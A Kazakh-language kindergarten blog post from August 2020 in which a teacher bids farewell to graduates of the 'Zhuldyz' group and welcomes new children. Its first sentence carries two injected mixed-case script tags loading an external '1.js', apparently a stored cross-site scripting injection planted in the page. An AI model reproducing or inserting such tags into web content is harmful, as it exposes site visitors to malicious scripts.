Жаз мезгілі жарқын жұлдыздай тез өтті, оқу жылының басталуына санаулы ғана күндер қалды.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.08.2020

Осы жылдың өзге жылдардан ерекше болып тұрғаны белгілі. Мектептер мен балабақша түлектері ұяларымен еш әсерлі кешсіз қоштасты. Небір жоспарлар мен істер аяқталмастан қалды. Балабақша түлектерінің балабақша қабырғасында өткізген қызықты күндері естерінде қалары сөзсіз. «Жұлдыз» тобының түлектері, сендер «Бірінші сынып оқушысысыңдар!». Өмірлеріңе ақ жол тілеймін. Табысқа жету үшін жақсы оқып, көп еңбектену керектігін сендер жақсы білесіңдер. Сендердің әрқайсыларың жұлдызша болсаңдар, бірге – тұтас ғаламсыңдар!

Енді біздің топта тағы да бүлдіршіндер күлкісі мен әдемі әуен естіледі. Әр таңымыз көңілді жаттығудан басталып жүр. Сендердің сүйікті Леголарыңнан біздің топтың жаңа «тұрғындары» жаңа қала құрастырып жатыр. «Жұлдыздың» жаңа жұлдызшалары тұтанып жатыр. Оларды талай қызықты күндер күтіп тұр.

 

Тәрбиеші О.Залесская

Просмотров: 747


Пікір қосу



Деректерді қолтаңбаға қосу